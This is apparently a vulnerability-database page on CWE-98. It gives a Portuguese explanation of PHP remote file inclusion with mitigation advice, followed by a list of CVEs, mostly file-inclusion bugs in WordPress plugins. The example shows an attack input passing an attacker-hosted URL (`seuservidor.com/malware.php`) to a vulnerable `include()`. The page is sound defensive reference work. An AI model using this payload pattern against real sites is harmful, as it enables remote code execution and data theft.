Weaknesses of type CWE-98

1,303 results

Inclusão remota de arquivo

Ocorre quando a aplicação inclui dinamicamente um arquivo (via funções como `include()`, `require()` em PHP) sem validar corretamente a entrada do usuário. Um atacante fornece uma URL remota maliciosa e consegue executar código arbitrário no servidor, comprometendo completamente a aplicação.

Example

Uma página PHP recebe um parâmetro `page` e faz `include($_GET['page'])`. Um atacante passa `page=http://seuservidor.com/malware.php` e consegue executar o arquivo malicioso no contexto do servidor web, roubando dados ou instalando backdoors.

How to mitigate

Valide rigorosamente entrada de usuário: use lista branca de arquivos permitidos, não permita URLs remotas, desabilite as directives `allow_url_include` e `allow_url_fopen` no PHP, e sempre sanitize caminhos de arquivo.

CVE-2025-0632CRITICALLocal File Inclusion (LFI) leading to sensitive data exposureEPSS 0.9%CVE-2024-13592HIGHTeam Builder For WPBakery Page Builder(Formerly Visual Composer) <= 1.0 - Authenticated (Contributor+) Local File InclusionEPSS 0.9%CVE-2025-23948HIGHWordPress Background animation blocks Plugin <= 2.1.5 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2024-5577CRITICALWhere I Was, Where I Will Be <= 1.1.1 - Unauthenticated Remote File InclusionEPSS 0.9%CVE-2025-39584HIGHWordPress Eventin plugin <= 4.0.25 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2024-12571CRITICALStore Locator <= 3.98.10 - Unauthenticated Local File InclusionEPSS 0.9%CVE-2025-32519HIGHWordPress IDonate plugin <= 2.1.18 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-32692HIGHWordPress WP Subscription Forms plugin <= 1.2.4 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2025-39592HIGHWordPress Subscribe to Unlock Lite plugin <= 1.3.0 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2025-23949HIGHWordPress Improved Sale Badges – Free Version Plugin <= 1.0.1 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-2101HIGHEdumall <= 4.2.4 - Unauthenticated Local File InclusionEPSS 0.9%CVE-2025-31015HIGHWordPress SMTP Service, Email Delivery Solved! — MailHawk plugin <= 1.3.1 - Local File Inclusion VulnerabilityEPSS 0.9%CVE-2024-36415CRITICALSuiteCRM Improper Control of Filename for Include Statement in PHP and Unrestricted Upload of File with Dangerous content leads to authenticated remote code executionEPSS 0.9%CVE-2025-32155HIGHWordPress Beds24 Online Booking plugin <= 2.0.28 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2024-1382HIGHRestaurant Reservations <= 1.9 - Directory Traversal to Authenticated (Contributor+) Local File InclusionEPSS 0.9%CVE-2015-6461—Remote file inclusion allows an attacker to craft a specific URL referencing the Schneider Electric Modicon BMXNOC0401, BMXNOE0100, BMXNOE01EPSS 0.9%CVE-2025-28916CRITICALWordPress Docpro plugin <= 2.0.1 - Local File Inclusion vulnerabilityEPSS 0.9%CVE-2025-11977MEDIUMHappyForms <= 1.26.12 - Authenticated (Admin+) Local File InclusionEPSS 0.9%CVE-2026-27556HIGHLocal File Inclusion in /index.php/ajax/save_iodd_parametersEPSS 0.9%CVE-2023-5099HIGHHTML filter and csv-file search <= 2.7 - Authenticated (Contributor+) Local File Inclusion via ShortcodeEPSS 0.9%